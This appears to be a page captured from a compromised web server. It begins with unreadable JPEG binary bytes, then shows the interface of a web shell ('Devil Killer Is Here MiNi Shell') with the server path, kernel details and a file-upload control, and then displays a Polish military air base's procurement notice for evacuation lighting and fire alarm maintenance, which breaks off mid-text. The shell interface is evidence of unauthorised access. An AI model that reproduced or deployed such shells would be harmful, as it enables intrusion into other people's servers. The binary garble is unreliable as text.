JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250711/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250711/0032225701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WykonaniePrzeglądówTechnicz,CzynnosciKonserwacyjnychOrazNaprawOświetleniaEwakuacyjnegoOrazWykonaniePrzeglądów technicz i czynności konserw SSP w bud admin przez 41BLSz. w Dęblinie z podziałem na zad </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261-517-525</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WykonaniePrzeglądówTechnicz,CzynnosciKonserwacyjnychOrazNaprawOświetleniaEwakuacyjnegoOrazWykonaniePrzeglądów technicz i czynności konserw SSP w bud admin przez 41BLSz. w Dęblinie z podziałem na zad </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97f99ea2-d532-495a-ae3c-c3e76a4d9dbb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00322257</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00100208/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 KONSERWACJA INSTALACJI PPOŻ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1136619 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcą w postępowaniu o udzielenie<br/>zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się w języku polskim przy użyciu<br/>środków komunikacji elektronicznej za pośrednictwem Platformy znajdującej się pod adresem:https://platformazakupowa.pl/transakcja/1136619<br/>. W sytuacjach awaryjnych np. w przypadku braku działania platformy zakupowej<br/>dopuszcza również możliwość składnia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń za pomocą poczty elektronicznej Zamawiającego tj. na adres 41blsz.przetargi@ron.mil.pl , z zastrzeżeniem, że<br/>OFERTA MUSI WPŁYNĄĆ NA WSKAZANĄ PLATFORMĘ ZAKUPOWĄ, A NIE WSKAZANĄ POCZTĘ<br/>ELEKTRONICZNĄ!!!!</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2. Wymagania techniczne i<br/>organizacyjne dot. korespondencji elektronicznej<br/>1) Wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2) W korespondencji wykonawca winien posługiwać się numerem sprawy określonym w 24/25/P.<br/>3) Formaty dokumentów elektronicznych (plików):<br/>a) pdf., .doc, .docx, .rtf, .xls, .xlsx,.pdf, .jpg, .zip. – zamawiający rekomenduje stosowanie formatu .pdf. z uwagi na niskie ryzyko<br/>naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu.<br/>b) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>c) do kompresji danych (zalecane) zamawiający rekomenduje formaty: .zip lub .7Z – zaleca się wcześniejsze podpisanie każdego<br/>pliku.<br/>4) Rozmiar jednego pliku przesyłanego przez:<br/>a) Platformę – formularz do złożenia, zmiany, wycofania oferty – max. 150 MB, pozostała komunikacja max. 500 MB.<br/>5) Do podpisania plików wykonawca może użyć:<br/>a) kwalifikowanego podpisu elektronicznego,<br/>W przypadku użycia podpisu zewnętrznego plik z podpisem należy przekazać łącznie z podpisywanym dokumentem. W przeciwnym<br/>razie zamawiający uzna taki dokument za niepodpisany.<br/>b) podpisu zaufanego (inaczej Profil Zaufany)<br/>– wielkość pliku nie może przekraczać 10 MB po podpisaniu dokumentu, dostępny format podpisu „xml”. Plik można podpisać na<br/>stronie:<br/>https://moj.gov.pl/nforms/signer/upload?xFormsAppName=SIGNER<br/>c) zaawansowanego podpisu elektronicznego z dowodu osobistego<br/>– informacje na stronach: https://www.gov.pl/web/e-dowod/podpis-osobisty<br/>oraz https://www.gov.pl/web/e-dowod<br/>Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na<br/>ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju (podpisywanie<br/>różnymi rodzajami podpisów, np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików) oraz nie<br/>wprowadzać jakichkolwiek zmian w plikach po ich podpisaniu, co mogłoby skutkować naruszeniem integralności plików.<br/>Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do<br/>zamawiającego”, nie za pośrednictwem adresu email.<br/>Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.Jeśli wykonawca pakuje dokumenty np.<br/>w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. Szczegóły w Rozdziale 9</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany<br/>do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą<br/>m.in.<br/>obowiązki wynikające z RODO - rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych Dz. Urz. UE L 119z 04.05.2016, str. 1), w<br/>szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i<br/>od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie<br/>miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust.<br/>4).W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby<br/>trzeciej, której dane zostały przekazane w związku z udziałem wykonawcy w postępowaniu, Zamawiający zobowiązuje wykonawcę<br/>do złożenia w postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający<br/>informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest: 41. Baza Lotnictwa Szkolnego w Dęblinie ul. Brygady Pościgowej 5 08 – 521<br/>Dęblin, NIP: 506-011-18-75, REGON: 061456920, kontakt: tel. 261 517 525, e-mail: 41blsz.przetargi@ron.mil.pl<br/>b) kontakt do Inspektora ochrony danych osobowych Zamawiającego: tel. 261 518 821, e-mail: 41blsz.iod@ron.mil.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wiązanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.:,,Wykonanie przeglądów technicznych, czynności konserwacyjnych oraz napraw oświetlenia ewakuacyjnego oraz wykonanie przeglądów technicznych i czynności konserwacyjnych Systemu Sygnalizacji Pożaru w budynkach administrowanych przez 41. Bazę Lotnictwa Szkolnego w Dęblinie z podziałem na zadania”SPRAWA, Nr 24/25/P prowadzonym w trybie podstawowym na podstawie art. 275 ust. 1 pkt 1.<br/>d) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 RODO;<br/>e) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>f) Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia; a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>g) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>h) posiada Pani/Pan: - na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, - na podstawie<br/>art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>i) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO<br/>Szczegółowe informacje w Rozdziale 20 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 19 ust. 4 ustawy Pzp - Zamawiający informuje o ograniczeniach<br/>stosowania przepisów rozporządzenia 2016/679, o których mowa w art. 19 ust. 2 i 3 ustawy:<br/>a) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.<br/>16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>b) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje<br/>ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia<br/>zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679.Udostępnianie, o którym mowa w art. 74 ust. 1 i 2 ustawy Pzp, ma<br/>zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 rozporządzenia 2016/679,<br/>zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa w art. 74 ust. 3 i art. 18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">24/25/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie usługi obejmującej swym zakresem wykonanie przeglądów technicznych, czynności konserwacyjnych oraz napraw oświetlenia ewakuacyjnego oraz wykonanie przeglądów technicznych i czynności konserwacyjnych Systemu Sygnalizacji Pożaru w budynkach administrowanych przez 41. Bazę Lotnictwa Szkolnego w Dęblinie.<br/><br/>2. Postępowanie zostało podzielone na 2 (dwa) niezależne części (zadania): <br/><br/>a/ część 1 - Zadanie nr I: Wykonanie przeglądów technicznych i czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego kompleksach wojskowych Dęblin Lotnisko, Dęblin-Twierdza, WCR Puławy, Bezwola, Klikawa administrowanych przez 41. BLSz<br/>W ramach zamówienia Wykonawca zrealizuje usługę polegającą na wykonaniu przeglądów technicznych, czynności konserwacyjnych, napraw instalacji systemu oświetlenia ewakuacyjnego w budynkach nr 6, nr 7, nr 109, 110, nr 115, nr 183, nr 192, nr 199, nr 205, nr 216, nr 236, nr 244, nr 267 wraz z częścią dobudowaną, nr 299, nr 409, nr 424, nr 427, nr 428, nr 430, nr 434, nr 435, nr 436, nr 437, nr 438, nr 439, nr 443 - 450, nr 451, nr 452, nr 453, nr 454, nr 456, nr 458, nr 459 znajdujących się na terenie kompleksu Dęblin Lotnisko, budynkach nr 48, nr 49, nr 68, nr 71, nr 74, nr 75, nr 78, nr 80, nr 85, nr 96, nr 99 znajdujące się w kompleksie wojskowym Bezwola, w budynkach nr 1, nr 19 znajdujących się w kompleksie wojskowym Dęblin-Twierdza, w budynku nr 1 WCR w Puławach, w budynku nr 2 znajdującego się w kompleksie wojskowym Klikawa <br/>Szczegółowy opis przedmiotu zamówienia ZADANIE I określa niniejsza SWZ oraz:<br/>a) Załącznik Nr 1 do SWZ Formularz Ofertowy (Załącznik Nr 1 do umowy);<br/>b) Załącznik Nr 1a do SWZ Szczegółowy opis przedmiotu zamówienia ZADANIE I (załącznik Nr 2 do umowy), <br/>c) Załącznik Nr 9a - Projektowane postanowienia umowy ZADANIE I.<br/>Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonaną usługę przeglądów, konserwacji, napraw na okres 12 miesięcy (dwunastu miesięcy), liczony od momentu podpisania protokołu odbioru usługi. Gwarancja udzielona Zamawiającemu przez Wykonawcę jest bezwarunkowa. Wykonawca nie może uzależnić jej udzielenia od spełnienia przez Zamawiającego jakichkolwiek dodatkowych warunków lub wymagań.4. Podwykonawstwo - dotyczy wszystkich zadań<br/>Zamawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych części zamówienia. <br/>W przypadku, gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy (z wyłączeniem zastosowania art. 462 ust. 5 i 6 ustawy Pzp), jest zobowiązany wskazać w ofercie: <br/>1) części zamówienia, które zamierza powierzyć podwykonawcy; <br/>2) nazwy ewentualnych podwykonawców (jeżeli są już znani).<br/>Powierzenie wykonania części zamówienia podwykonawcy/om nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia.<br/>Wszędzie tam, gdzie przedmiot zamówienia jest opisany poprzez wskazanie: znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty dostarczane przez konkretnego Wykonawcę, jeżeli miałoby to doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów – Zamawiający dopuszcza zastosowanie przez wykonawcę materiałów równoważnych w stosunku do opisanych w opisie przedmiotu zamówienia (podstawa prawna art. 99 ust. 5 ustawy Pzp), pod warunkiem, że będą one posiadały, co najmniej takie same lub lepsze parametry techniczne i funkcjonalne i nie obniżą określonych w SWZ standardów. Nie dopuszcza się odstępstw od minimalnych parametrów oraz funkcji i przeznaczenia. Należy przyjąć, że wskazane znaki towarowe określają minimalne parametry techniczne, eksploatacyjne, użytkowe wymagane przez Zamawiającego (mają charakter przykładowy). Ich wskazanie w opisie przedmiotu zamówienia ma na celu doprecyzowanie oczekiwań Zamawiającego w stosunku do przedmiotu zamówienia i stanowi wzorzec przedmiotu zamówienia.ZADANIE I:<br/><br/>- Zobowiązania Wykonawcy<br/>Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia siłami własnymi i z własnych materiałów, zgodnie z posiadaną wiedzą techniczną, w sposób zgodny z technologią konserwacji i napraw instalacji oświetlenia ewakuacyjnego oraz przy użyciu materiałów dopuszczonych do obrotu, lub przedstawi do zatwierdzenia przez Zamawiającego umowę z podwykonawcą.<br/><br/>Wykonawca jako wytwórca odpadów zobowiązany jest do przestrzegania przepisów ustawy o odpadach z dnia 14.12.2012 r, będzie unikał szkodliwych działań w zakresie nadmiernego hałasu i innych szkodliwych dla środowiska i otoczenia czynników powodowanych działalnością przy wykonywaniu usług.<br/><br/>Wykonawca zobowiązany jest do realizacji usługi w sposób uniemożliwiający powstanie jakichkolwiek uszkodzeń w mieniu Zamawiającego, użytkowników kompleksów wojskowych objętych usługą lub osób trzecich. W przypadku wyrządzenia jakiejkolwiek szkody, Wykonawca zobowiązuje się do jej naprawienia bądź usunięcia na własny koszt, a gdy będzie to niemożliwe, poniesie on koszty odszkodowania lub zadośćuczynienia.<br/><br/>- Sprzęt i narzędzia:<br/><br/>Wykonawca zapewnia całość robocizny, sprzętu, materiałów, narzędzi i transportu niezbędnych do wykonania usługi stanowiącej przedmiot umowy. Koszty wliczone do ceny usługi.<br/><br/>Narzędzia, materiały i sprzęt używany podczas realizacji usługi winny posiadać stosowne atesty lub certyfikaty, dopuszczające je do powszechnego użytku oraz do stosowania podczas wykonywania prac, oraz winny spełniać wszystkie wymagania określone w ustawie z dnia 7 lipca 1994 roku Prawo budowlane oraz ustawie z dnia 16 kwietnia 2004 roku o wyrobach budowlanych.<br/><br/>Prowadzone w ramach przedmiotowej usługi prace muszą być wykonywane w sposób zgodny z przepisami ustawy z dnia 27 kwietnia 2001 roku Prawo ochrony środowiska. W szczególności Wykonawca winien unikać szkodliwych działań w zakresie nadmiernego hałasu i innych szkodliwych dla środowiska i otoczenia czynników, powodowanych wykonywanymi pracami. Ponadto Wykonawca jako wytwórca odpadów zobowiązany jest do przestrzegania przepisów ustawy z dnia 14 grudnia 2012 roku o odpadach.<br/>Podczas realizacji usługi przeglądu konserwacyjnego, konserwacji instalacji oświetlenia ewakuacyjnego Wykonawca zabezpiecza we własnym zakresie bez dodatkowego wynagrodzenia podstawowe materiały konserwacyjne i drobne części, jak: krótkie przewody elektryczne, zaciski 